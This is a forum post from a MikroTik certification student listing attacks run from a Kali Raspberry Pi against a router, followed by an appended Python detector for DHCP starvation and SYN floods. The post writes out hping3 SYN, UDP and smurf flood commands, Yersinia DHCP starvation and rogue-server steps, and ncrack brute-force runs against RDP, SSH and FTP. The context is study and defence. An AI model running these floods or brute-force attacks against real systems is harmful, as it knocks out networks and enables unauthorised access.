#1
Hey guys,

While studying for the MikroTik MTCSE cert, I ran into several useful tools and attacks that we successfully performed against a MikroTik hAP Lite using a Raspberry Pi 2b+. The routerboard completely crashes, requiring a manual reboot. Against an RB3011 the Raspberry Pi was too weak to successfully pull off the attack; however, given stronger hardware, these attacks will be successful.

Note: These attacks can be performed on other networking hardware as well, not only MikroTik. There are mitigation methods to prevent these kinds of attacks that should be implemented in production.

The Raspberry Pi was installed as follows:


1) Install Kali Linux on Raspberry Pi
 
2) Run Kali Linux then update
sudo apt update -y && sudo apt upgrade -y
 
3) Optional: Install RDP and enable AutoStart (easier access to the Raspberry Pi via RDP)
sudo apt-get install xrdp
systemctl enable xrdp
service xrdp start
 
4) Install Attack Tools
sudo apt-get install nmap yersinia hping3
 
5) Perform attacks
# Yersinia (OSI Layer 2 Attacks - CDP, DHCP, STP...) | https://github.com/tomac/yersinia
> DHCP Starvation: yersinia -G > Launch Attack > DHCP > sending DISCOVER packet
> DHCP Rogue MITM: yersinia -G > Launch Attack > DHCP > creating DHCP rogue server
> MNDP/CDP/LLDP attack: yersinia -G > Launch Attack > CDP > flooding CDP table


# nmap (OSI Layer 4 - Port Scanner) | https://nmap.org
> Simple Port Scan: nmap 10.0.0.1
> Port Scan with Version Detection: nmap -A -T4 -F 10.0.0.1
> Determine Uptime: nmap -v -O 10.0.0.1
> Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet


# hping3 (OSI Layer 3/4 Attacks - Flood SYN, UDP...) | https://tools.kali.org/information-gathering/hping3
> DNS Flood: hping3 --udp -p 53 --flood --rand-source 10.0.0.1
> TCP SYN Attack: hping3 -p 80 --flood -d 120 -S -w 64 --rand-source -c 20000 10.0.0.1
> ICMP Smurf Attack: hping3 --icmp --spoof --flood --rand-source -c 20000 10.0.0.1 10.0.0.255


# ncrack (OSI Layer 4 - Brute Force Attacks) | https://nmap.org/ncrack/
> RDP - ncrack -vv -U username.txt -P password.txt 192.168.1.208:3389
> SSH - ncrack -vv -U username.txt -P password.txt 192.168.1.208:22
> FTP - ncrack -vv -U username.txt -P password.txt 192.168.1.208:21

Feel free to like, share & comment =).  
Fiesta
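The post notes that mitigations exist but does not show how a defender would recognise these floods in the first place. The script below is an added example, not part of the original post and not MikroTik or Kali tooling: it replays constructed packet-summary lines (the log format, the thresholds and the sample events are all assumptions made for this example) and flags the two signatures that stand out in the traffic described above, a burst of DHCP DISCOVERs each carrying a fresh client MAC (starvation draining the pool) and a burst of TCP SYNs from many distinct sources that never complete a handshake (a random-source SYN flood).

```python
"""Offline detector for DHCP starvation and random-source SYN floods.

Added example with constructed data; the line format and thresholds are
assumptions, not any vendor's log format.
"""
from collections import defaultdict


def build_sample_log():
    """Constructed packet summaries (not real captures). One event per line:
       "<time_s> <kind> <a> <b>" where
         dhcp <client_mac> <switch_port>   DHCP DISCOVER seen on an access port
         syn  <src_ip> <dst_port>          TCP SYN arriving at the router
         ack  <src_ip> <dst_port>          final ACK of a completed handshake
    """
    lines = []
    # Benign: three clients on ether2 ask for a lease; ten SYNs to :80 all complete.
    for i in range(3):
        lines.append(f"{i:.1f} dhcp 02:00:00:00:00:0{i} ether2")
    for i in range(10):
        lines.append(f"{i:.1f} syn 10.0.0.{i + 10} 80")
        lines.append(f"{i + 0.2:.1f} ack 10.0.0.{i + 10} 80")
    # Starvation pattern: 60 DISCOVERs, each with a new MAC, within two seconds on ether3.
    for i in range(60):
        lines.append(f"{20 + i / 30:.2f} dhcp 02:00:00:00:01:{i:02x} ether3")
    # Flood pattern: 200 SYNs to :80 from 200 distinct (spoofed) sources, no ACKs ever.
    for i in range(200):
        lines.append(f"{30 + i / 200:.3f} syn 198.51.100.{i + 1} 80")
    return "\n".join(lines)


def parse_events(text):
    """Parse log lines into (time, kind, a, b) tuples, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        t, kind, a, b = parts
        events.append((float(t), kind, a, b))
    return events


def detect_dhcp_starvation(events, window=10.0, max_distinct_macs=20):
    """Flag a switch port when more than `max_distinct_macs` different client
    MACs send DISCOVER inside one `window`-second bucket. A real access port
    rarely sees more than a handful of new clients per window; starvation
    tools mint a fresh MAC per request to exhaust the lease pool."""
    macs = defaultdict(set)  # (port, bucket) -> set of client MACs
    for t, kind, mac, port in events:
        if kind == "dhcp":
            macs[(port, int(t // window))].add(mac)
    alerts = []
    for (port, bucket), seen in sorted(macs.items()):
        if len(seen) > max_distinct_macs:
            alerts.append({"port": port, "window_start": bucket * window,
                           "distinct_macs": len(seen)})
    return alerts


def detect_syn_flood(events, window=10.0, min_syns=100, min_sources=50,
                     max_completion=0.1):
    """Flag a destination port when a bucket holds many SYNs from many distinct
    sources and almost none of them complete the handshake: spoofed sources
    never answer the SYN-ACK, so the completion ratio collapses toward zero."""
    syns = defaultdict(list)  # (dst_port, bucket) -> list of source IPs
    acks = defaultdict(int)   # (dst_port, bucket) -> completed handshakes
    for t, kind, src, dport in events:
        if kind not in ("syn", "ack"):
            continue
        key = (int(dport), int(t // window))
        if kind == "syn":
            syns[key].append(src)
        else:
            acks[key] += 1
    alerts = []
    for (dport, bucket), sources in sorted(syns.items()):
        n = len(sources)
        distinct = len(set(sources))
        completed = acks[(dport, bucket)]
        if n >= min_syns and distinct >= min_sources and completed / n <= max_completion:
            alerts.append({"dst_port": dport, "window_start": bucket * window,
                           "syns": n, "distinct_sources": distinct,
                           "completed": completed})
    return alerts


if __name__ == "__main__":
    ev = parse_events(build_sample_log())
    for a in detect_dhcp_starvation(ev):
        print("DHCP starvation suspected:", a)
    for a in detect_syn_flood(ev):
        print("SYN flood suspected:", a)
```

Both detectors use fixed time buckets rather than a sliding window, which keeps the example short and deterministic; a production version would slide the window and feed the alerts into whatever rate-limiting or port-isolation control the switch or router offers.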